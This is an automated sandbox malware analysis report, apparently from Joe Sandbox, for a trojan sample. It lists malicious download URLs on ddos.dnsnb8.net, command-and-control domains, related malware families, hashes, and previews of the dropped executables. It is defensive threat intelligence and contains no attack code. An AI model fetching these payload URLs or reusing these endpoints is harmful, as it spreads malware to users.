punchtelephoneverdi.store | 20% | Virustotal |
theoryapparatusjuko.fun | 20% | Virustotal |
snuggleapplicationswo.fun | 21% | Virustotal |
strainriskpropos.store | 21% | Virustotal |
smallrabbitcrossing.site | 21% | Virustotal |
Source | Detection | Scanner | Label
http://www.scintilla.org/scite.rng | 0% | URL Reputation | safe
http://www.activestate.comHolger | 0% | URL Reputation | safe
http://ddos.dnsnb8.net:799/cj//k2.rar | 100% | URL Reputation | malware
http://www.baanboard.comBrendon | 0% | URL Reputation | safe
https://www.smartsharesystems.com/ | 0% | URL Reputation | safe
http://www.scintilla.org | 0% | URL Reputation | safe
http://www.develop.com | 0% | URL Reputation | safe
http://ddos.dnsnb8.net:799/cj//k1.rar | 100% | URL Reputation | malware
http://www.spaceblue.com | 0% | URL Reputation | safe
http://www.baanboard.com | 0% | URL Reputation | safe
http://www.develop.comDeepak | 0% | URL Reputation | safe
http://www.rftp.comJosiah | 0% | URL Reputation | safe
http://www.activestate.com | 0% | URL Reputation | safe
http://upx.sf.net | 0% | URL Reputation | safe
http://www.rftp.com | 0% | URL Reputation | safe
http://www.spaceblue.comMathias | 0% | URL Reputation | safe
https://www.smartsharesystems.com/Morten | 0% | URL Reputation | safe
http://www.lua.org | 0% | URL Reputation | safe
http://ddos.dnsnb8.net/ | 100% | URL Reputation | malware
healthproline.pro | 100% | Avira URL Cloud | malware
smallrabbitcrossing.site | 100% | Avira URL Cloud | malware
http://ddos.dnsnb8.net:799/cj//k1.rars | 100% | Avira URL Cloud | phishing
https://strainriskpropos.store/api | 100% | Avira URL Cloud | malware
https://strainriskpropos.store:443/api | 100% | Avira URL Cloud | malware
https://telephoneverdictyow.site/apiGaX | 100% | Avira URL Cloud | malware
https://strainriskpropos.store/D%D | 100% | Avira URL Cloud | malware
https://punchtelephoneverdi.store:443/api | 100% | Avira URL Cloud | malware
https://strainriskpropos.store:443/api | 18% | Virustotal |
https://strainriskpropos.store/api | 18% | Virustotal |
https://snuggleapplicationswo.fun/ | 100% | Avira URL Cloud | malware
http://ddos.dnsnb8.net:799/cj//k2.rarNp3 | 100% | Avira URL Cloud | malware
healthproline.pro | 11% | Virustotal |
punchtelephoneverdi.stor | 0% | Avira URL Cloud | safe
https://telephoneverdictyow.site/l | 100% | Avira URL Cloud | malware
https://telephoneverdictyow.site/ | 100% | Avira URL Cloud | malware
https://smallrabbitcrossing.site/api | 100% | Avira URL Cloud | malware
https://telephoneverdictyow.site/api | 100% | Avira URL Cloud | malware
telephoneverdictyow.site | 100% | Avira URL Cloud | malware
http://ddos.dnsnb8.net:799/cj//k1.rar= | 100% | Avira URL Cloud | phishing
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE | 0% | Avira URL Cloud | safe
http://ddos.dnsnb8.net:799/cj//k2.rarh | 100% | Avira URL Cloud | phishing
https://punchtelephoneverdi.store/ | 100% | Avira URL Cloud | malware
strainriskpropos.stor | 0% | Avira URL Cloud | safe
https://strainriskpropos.store/ | 100% | Avira URL Cloud | malware
https://strainriskpropos.store/M%s | 100% | Avira URL Cloud | malware
https://punchtelephoneverdi.store/apihL | 100% | Avira URL Cloud | malware
https://strainriskpropos.store/api; | 100% | Avira URL Cloud | malware
http://ddos.dnsnb8.net:799/cj//k1.rarZ | 100% | Avira URL Cloud | malware
http://ddos.dnsnb8.net:799/cj//k2.rarF; | 100% | Avira URL Cloud | phishing
https://telephoneverdictyow.site:443/api | 100% | Avira URL Cloud | malware
https://smallrabbitcrossing.site/ | 100% | Avira URL Cloud | malware
http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1 | 100% | Avira URL Cloud | malware
snuggleapplicationswo.fun | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ddos.dnsnb8.net | 44.221.84.105 | true | false | | unknown
healthproline.pro | unknown | unknown | true | | unknown
smallrabbitcrossing.site | unknown | unknown | true | | unknown
strainriskpropos.store | unknown | unknown | true | | unknown
snuggleapplicationswo.fun | unknown | unknown | true | | unknown
punchtelephoneverdi.store | unknown | unknown | true | | unknown
telephoneverdictyow.site | unknown | unknown | true | | unknown
theoryapparatusjuko.fun | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
healthproline.pro | true | 11% Virustotal; Avira URL Cloud: malware | unknown
smallrabbitcrossing.site | true | Avira URL Cloud: malware | unknown
http://ddos.dnsnb8.net:799/cj//k2.rar | true | URL Reputation: malware | unknown
http://ddos.dnsnb8.net:799/cj//k1.rar | true | URL Reputation: malware | unknown
punchtelephoneverdi.stor | true | Avira URL Cloud: safe | unknown
telephoneverdictyow.site | true | Avira URL Cloud: malware | unknown
strainriskpropos.stor | true | Avira URL Cloud: safe | unknown
theoryapparatusjuko.fun | true | | unknown
snuggleapplicationswo.fun | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://strainriskpropos.store/api | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013BC000.00000004.00000020.00020000.00000000.sdmp | false | 18% Virustotal; Avira URL Cloud: malware | unknown
http://www.scintilla.org/scite.rng | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.activestate.comHolger | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://ddos.dnsnb8.net:799/cj//k1.rars | jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://strainriskpropos.store:443/api | Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp | false | 18% Virustotal; Avira URL Cloud: malware | unknown
https://telephoneverdictyow.site/apiGaX | Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.baanboard.comBrendon | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
https://strainriskpropos.store/D%D | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.smartsharesystems.com/ | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.scintilla.org | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
https://punchtelephoneverdi.store:443/api | Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.develop.com | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://ddos.dnsnb8.net:799/cj//k2.rarNp3 | jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.spaceblue.com | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.baanboard.com | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.develop.comDeepak | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
https://snuggleapplicationswo.fun/ | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://telephoneverdictyow.site/l | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://telephoneverdictyow.site/ | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://smallrabbitcrossing.site/api | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://telephoneverdictyow.site/api | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ddos.dnsnb8.net:799/cj//k1.rar= | jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://www.rftp.comJosiah | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.activestate.com | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE | jawuwAtX.exe, 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp, jawuwAtX.exe, 00000002.00000003.2145539627.0000000000F50000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ddos.dnsnb8.net:799/cj//k2.rarh | jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://upx.sf.net | Amcache.hve.2.dr | false | URL Reputation: safe | unknown
http://www.rftp.com | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://www.spaceblue.comMathias | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
https://punchtelephoneverdi.store/ | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://strainriskpropos.store/ | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.smartsharesystems.com/Morten | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
https://punchtelephoneverdi.store/apihL | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://strainriskpropos.store/M%s | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://strainriskpropos.store/api; | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ddos.dnsnb8.net:799/cj//k1.rarZ | jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.lua.org | SciTE.exe.2.dr | false | URL Reputation: safe | unknown
http://ddos.dnsnb8.net/ | jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://ddos.dnsnb8.net:799/cj//k2.rarF; | jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://telephoneverdictyow.site:443/api | Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://smallrabbitcrossing.site/ | Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1 | jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
44.221.84.105 | ddos.dnsnb8.net | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1481153
Start date and time: 2024-07-25 04:57:18 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Lisect_AVT_24003_G1A_72.exe
Detection: MAL
Classification: mal100.spre.troj.evad.winEXE@5/11@8/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 14
        • Number of non-executed functions: 14
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 13.89.179.12
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
22:58:15 | API Interceptor | 3x Sleep call for process: Lisect_AVT_24003_G1A_72.exe modified
22:58:20 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match: 44.221.84.105
Associated Sample Name / URL | Detection | Threat Name | Context
Lisect_AVT_24003_G1A_5.exe | malicious | Quasar, Bdaejec | ddos.dnsnb8.net:799/cj//k1.rar
Lisect_AVT_24003_G1A_16.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k2.rar
LisectAVT_2403002C_193.exe | malicious | Bdaejec, Metasploit | ddos.dnsnb8.net:799/cj//k3.rar
LisectAVT_2403002C_196.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k1.rar
LisectAVT_2403002B_91.exe | malicious | Bdaejec, DBatLoader | ddos.dnsnb8.net:799/cj//k2.rar
LisectAVT_2403002B_492.exe | malicious | Bdaejec, Lokibot | ddos.dnsnb8.net:799/cj//k5.rar
LisectAVT_2403002B_97.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k2.rar
LisectAVT_2403002B_28.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k1.rar
LisectAVT_2403002B_351.exe | malicious | Amadey, Bdaejec | ddos.dnsnb8.net:799/cj//k5.rar
LisectAVT_2403002B_28.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k1.rar
Match: ddos.dnsnb8.net
Associated Sample Name / URL | Detection | Threat Name | Context
Lisect_AVT_24003_G1A_5.exe | malicious | Quasar, Bdaejec | 44.221.84.105
Lisect_AVT_24003_G1A_16.exe | malicious | Bdaejec | 44.221.84.105
LisectAVT_2403002C_193.exe | malicious | Bdaejec, Metasploit | 44.221.84.105
LisectAVT_2403002C_196.exe | malicious | Bdaejec | 44.221.84.105
LisectAVT_2403002B_91.exe | malicious | Bdaejec, DBatLoader | 44.221.84.105
LisectAVT_2403002B_492.exe | malicious | Bdaejec, Lokibot | 44.221.84.105
LisectAVT_2403002B_97.exe | malicious | Bdaejec | 44.221.84.105
LisectAVT_2403002B_28.exe | malicious | Bdaejec | 44.221.84.105
LisectAVT_2403002B_351.exe | malicious | Amadey, Bdaejec | 44.221.84.105
LisectAVT_2403002B_28.exe | malicious | Bdaejec | 44.221.84.105
Match: AMAZON-AESUS
Associated Sample Name / URL | Detection | Threat Name | Context
Lisect_AVT_24003_G1A_5.exe | malicious | Quasar, Bdaejec | 44.221.84.105
Lisect_AVT_24003_G1A_16.exe | malicious | Bdaejec | 44.221.84.105
LisectAVT_2403002C_193.exe | malicious | Bdaejec, Metasploit | 44.221.84.105
LisectAVT_2403002C_196.exe | malicious | Bdaejec | 44.221.84.105
LisectAVT_2403002B_91.exe | malicious | Bdaejec, DBatLoader | 44.221.84.105
LisectAVT_2403002B_492.exe | malicious | Bdaejec, Lokibot | 44.221.84.105
LisectAVT_2403002B_97.exe | malicious | Bdaejec | 44.221.84.105
LisectAVT_2403002B_28.exe | malicious | Bdaejec | 44.221.84.105
LisectAVT_2403002B_351.exe | malicious | Amadey, Bdaejec | 44.221.84.105
LisectAVT_2403002B_28.exe | malicious | Bdaejec | 44.221.84.105
        No context
Match: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
Associated Sample Name / URL | Detection | Threat Name
Lisect_AVT_24003_G1A_5.exe | malicious | Quasar, Bdaejec
Lisect_AVT_24003_G1A_16.exe | malicious | Bdaejec
LisectAVT_2403002C_193.exe | malicious | Bdaejec, Metasploit
LisectAVT_2403002C_196.exe | malicious | Bdaejec
LisectAVT_2403002B_91.exe | malicious | Bdaejec, DBatLoader
LisectAVT_2403002B_492.exe | malicious | Bdaejec, Lokibot
LisectAVT_2403002B_97.exe | malicious | Bdaejec
LisectAVT_2403002B_28.exe | malicious | Bdaejec
LisectAVT_2403002B_351.exe | malicious | Amadey, Bdaejec
LisectAVT_2403002B_28.exe | malicious | Bdaejec
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):19456
                            Entropy (8bit):6.5906137557629965
                            Encrypted:false
                            SSDEEP:384:1FlS5XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:43QGPL4vzZq2o9W7GsxBbPr
                            MD5:BE24B4EBED28B9588B8AE174E95C4285
                            SHA1:C89B3398B15CC38ED29E508C9024E412CE76049F
                            SHA-256:85F4C6069942D9C7B0095F89AF463C192EA8801784751CA3322A8A067A3B28FD
                            SHA-512:4E3249C1F3F312EB8D2CB35F1080E2BB5955E44931A2199246A944FAB1CAB2110344C1CD51DB4333BA28DD0A6D7461D7E04586E00FB1AE5BB76EAE5E3437D25C
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):2389504
                            Entropy (8bit):6.731344126494033
                            Encrypted:false
                            SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                            MD5:31DA1001265A8090340DF175C3EBB35B
                            SHA1:1635764E533D859EDA7227B5BA5B4BEF779A1D59
                            SHA-256:9E444CFD7BDB8C393B64F75310A0CA7E80FFE8A678689DA2D1D1EBC7B9DE3AAD
                            SHA-512:70F6DAD677E5C360B1D26E4E93E34127A3786046502C2F30BFA5C22C06330C902FBAA435C9C95FD33E4A7E6493CADC64DE09DE61B776490A08757E8311DDA997
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):31744
                            Entropy (8bit):6.366494315388193
                            Encrypted:false
                            SSDEEP:768:uWQ3655Kv1X/qY1MSdfmQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdf9GCq2iW7z
                            MD5:C85E3E1B5216AC6FE2FF69F1124397E0
                            SHA1:563AD0F43213986CF3147A1AE3C09686A50347A3
                            SHA-256:E05444242F8F435F71BD0F1924D5E8FC27214C8AEF155E45A1D93D047B2EAD00
                            SHA-512:15FE0FCA971CEFCC40B761027EA9338EF8C674394A7D3E1F8A74460C8D7F0BB5E616BFD91EAB6CAA1C1AEC259A177A00C600B208025B92331B6C6EF98B46B405
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9769676201613777
                            Encrypted:false
                            SSDEEP:192:f12bNHhSUI20rGrxJZj8fpvzuiF6Z24IO8gO/:E7S5rGrBjKzuiF6Y4IO8Z
                            MD5:BBADCCD0B29A0F6D427D1BECF00F6760
                            SHA1:6F49A232417353A53FE474F073594DC0FD4433CA
                            SHA-256:D361397C5F0A8A074EE41442A276007DF816BBEE58E10D323C1A709A7D5852AF
                            SHA-512:74C4356FA5CFFCCACFAE5311F9D7AF23820F08B26913399BCD4BD41284118D8371240B19A5B0A87B4906C95038D2CA46C1B65B7B07D1868E4108DB826C5A716E
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.4.9.8.9.7.1.1.1.0.0.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.4.9.8.9.7.9.5.4.7.6.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.3.e.3.8.e.9.-.d.b.4.d.-.4.8.e.3.-.b.2.9.3.-.e.2.d.6.1.7.1.3.e.a.c.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.3.c.6.6.d.2.-.4.8.3.9.-.4.8.a.6.-.b.d.9.0.-.1.8.8.5.0.e.a.a.7.a.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.a.w.u.w.A.t.X...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.e.8.-.0.0.0.1.-.0.0.1.5.-.3.b.7.d.-.2.3.7.c.3.e.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.9.6.b.e.f.4.6.4.e.d.e.3.7.4.3.b.a.5.1.c.4.1.5.3.f.5.d.f.3.6.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.j.a.w.u.w.A.t.X...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Thu Jul 25 02:58:17 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):157498
                            Entropy (8bit):1.8333085239526192
                            Encrypted:false
                            SSDEEP:768:pRHr4SBVZL3y4NuhRkvyJZHIqznyaO1xsPfIk:Lr4K+E9gIqWaOPsPwk
                            MD5:7DC6DE53410E16F349D3BD15BC83D703
                            SHA1:880A032BC0CACC88C66680935AC694904793DA13
                            SHA-256:7792385A5E2532BC3F7D493D9565DD99F5543EEBADA5C4BB12E33776D05CD169
                            SHA-512:2D119D62EC6A37C6BEEF6931C4FC0D3C3862221C7FA6BFFB61EC9D280520ED0BA93644650D396695D29891779A8C8F0F9F2982055A240AF6AA9D856E1E665372
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... .......I..f............t.......................<...T ......d....P..........`.......8...........T............=..J)........... ..........|"..............................................................................eJ.......#......GenuineIntel............T...........C..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):6280
                            Entropy (8bit):3.722717972355917
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJI8m64I+Yqk00pDp89bXvsfndm:R6lXJS6WYW/XUfA
                            MD5:2E62EDBC581E22FE0BFB2198BF39E3D7
                            SHA1:BFDED2D84FB1657C52374CB266B3296B56F365AA
                            SHA-256:B17981CC70A7972D805F23D28617C6A879E6A66574647D632CA9FAD11C8E1741
                            SHA-512:F63135F95B866359D49E427A17E04C7121BAEE93D0E01A6FA98C66294841B3A5012533EF0F6C8B7A9B3600C60639B3FBC8E2969B87CE880BDE5DE4ABD8016EAD
                            Malicious:false
                            Reputation:low
